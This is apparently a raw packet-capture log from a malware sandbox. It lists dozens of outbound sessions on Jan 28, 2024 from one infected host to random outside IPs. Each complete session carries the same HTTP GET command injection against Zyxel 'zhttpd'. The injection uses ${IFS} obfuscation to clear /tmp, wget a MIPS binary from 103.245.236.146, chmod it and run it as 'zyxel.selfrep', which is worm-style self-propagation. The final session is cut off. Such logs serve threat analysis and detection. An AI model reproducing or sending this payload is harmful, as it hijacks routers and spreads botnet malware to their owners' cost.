                                                869192.168.2.234004818.111.201.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601176023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                870192.168.2.2336586219.183.181.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601197004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                871192.168.2.2353396129.198.63.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601238966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                872192.168.2.2342640200.67.216.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601269007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                873192.168.2.2338682223.209.49.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601300955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                874192.168.2.2336730119.187.148.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601334095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                875192.168.2.234525040.135.90.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601361990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                876192.168.2.2357590120.180.230.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601409912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                877192.168.2.2335000167.143.28.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601432085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                878192.168.2.2351896193.169.178.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601478100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                879192.168.2.2345048173.153.0.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601505041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                880192.168.2.2340470205.209.82.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601506948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                881192.168.2.234748872.156.255.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601527929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                882192.168.2.235905085.116.3.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601558924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                883192.168.2.2360594122.31.129.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601568937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                884192.168.2.2334282144.146.243.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601574898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                885192.168.2.2347564128.109.236.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601643085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                886192.168.2.234693893.109.71.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601660967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                887192.168.2.235491697.158.16.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601679087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                888192.168.2.2360282168.115.135.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601710081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                889192.168.2.235762472.126.160.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601738930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                890192.168.2.234878242.118.187.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601769924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                891192.168.2.2355270145.93.175.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601789951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                892192.168.2.2347346107.198.207.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601836920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                893192.168.2.23364962.70.90.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601852894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                894192.168.2.2336122191.246.40.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601902962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                895192.168.2.233826043.176.86.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601957083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                896192.168.2.2357620174.48.103.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.601978064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                897192.168.2.2350268222.136.13.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602010012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                898192.168.2.2359892142.252.135.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602056980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                899192.168.2.2343686185.242.6.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602070093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                900192.168.2.2345572207.138.147.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602088928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                901192.168.2.2336684176.184.42.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602139950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                902192.168.2.2343696113.172.140.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602152109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                903192.168.2.233326896.111.111.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602174997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                904192.168.2.235737664.231.177.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602215052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                905192.168.2.236075643.64.227.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602215052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                906192.168.2.2354706146.65.166.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602257013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                907192.168.2.2333992130.161.56.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602271080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                908192.168.2.2342420178.248.81.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602300882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                909192.168.2.234760473.230.19.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602323055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                910192.168.2.233488460.34.81.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602351904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                911192.168.2.2349016203.53.61.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602368116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                912192.168.2.233832281.186.14.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602406025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                913192.168.2.234895463.192.186.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602426052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                914192.168.2.2356348113.249.236.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602494001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                915192.168.2.2355138202.179.135.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602530003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                916192.168.2.23396248.80.119.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602534056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                917192.168.2.2337714171.82.37.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602557898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                918192.168.2.234843412.137.130.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602588892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                919192.168.2.2346884100.245.234.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602628946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                920192.168.2.2350404162.196.9.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602642059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                921192.168.2.235253496.201.36.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602654934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                922192.168.2.234409466.119.65.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602694035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                923192.168.2.2353168187.179.21.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602721930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                924192.168.2.2333682209.57.212.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602760077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                925192.168.2.2344556122.207.127.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602777958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                926192.168.2.2355512169.146.7.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602812052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                927192.168.2.2360660131.129.120.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602813959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                928192.168.2.2360174185.79.251.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602847099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                929192.168.2.234266854.55.183.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602874041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                930192.168.2.234058495.21.85.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.602897882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                931192.168.2.2332992212.184.114.247443
                                                TimestampBytes transferredDirectionData
